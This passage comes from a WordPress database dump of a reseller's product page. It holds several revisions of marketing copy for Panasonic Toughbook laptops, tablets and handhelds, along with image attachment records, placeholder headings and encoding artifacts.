exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>Â </p><h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>Â </p><h5 style=\"font-size: 1rem; line-height: 1.4rem; margin-top: 1.5rem; margin-bottom: 1rem; color: #000000; font-weight: 500; font-family: DINOT, Arial, Helvetica, sans-serif;\">PRODUCT DETAILS</h5><p style=\"margin-top: 1rem; margin-bottom: 1rem;\">The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>Â </p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 10:08:13','2018-12-20 02:08:13','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2601,1,'2018-12-20 10:04:13','2018-12-20 02:04:13','','fz-t1_image1-1_ss_1','','inherit','closed','closed','','fz-t1_image1-1_ss_1','','','2018-12-20 10:04:13','2018-12-20 02:04:13','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg',0,'attachment','image/jpeg',0),(2604,1,'2018-12-20 10:07:55','2018-12-20 02:07:55','','fz-n1_mk2_android_image_2_1','','inherit','closed','closed','','fz-n1_mk2_android_image_2_1','','','2018-12-20 10:07:55','2018-12-20 02:07:55','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg',0,'attachment','image/jpeg',0),(2603,1,'2018-12-20 10:07:19','2018-12-20 02:07:19','','236380_F1X1_Hero','','inherit','closed','closed','','236380_f1x1_hero','','','2018-12-20 10:07:19','2018-12-20 02:07:19','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png',0,'attachment','image/png',0),(2606,1,'2018-12-20 10:14:13','2018-12-20 02:14:13','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n			<h4>TOUGHBOOK 31</h4>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"1\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n			<h4>TOUGHBOOK N1</h4>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h2>Tablets</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 10:14:13','2018-12-20 02:14:13','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2607,1,'2018-12-20 10:18:15','2018-12-20 02:18:15','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n			<h4>TOUGHBOOK 31</h4>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"1\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n			<h4>TOUGHBOOK N1</h4>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Tablets</h3>		\n			<h2>TOUGHBOOK L1</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p><br />Read more at https://na.panasonic.com/us/computers-tablets-handhelds/tablets/tablets/toughbook-l1#dTovJ2FZwMSF072x.99</p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 10:18:15','2018-12-20 02:18:15','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2614,1,'2018-12-20 10:28:10','2018-12-20 02:28:10','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n			<h4>TOUGHBOOK 31</h4>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"1\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 